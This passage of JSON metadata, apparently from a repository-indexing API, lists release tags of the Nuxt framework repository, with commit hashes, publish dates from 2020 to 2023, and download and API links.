"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHu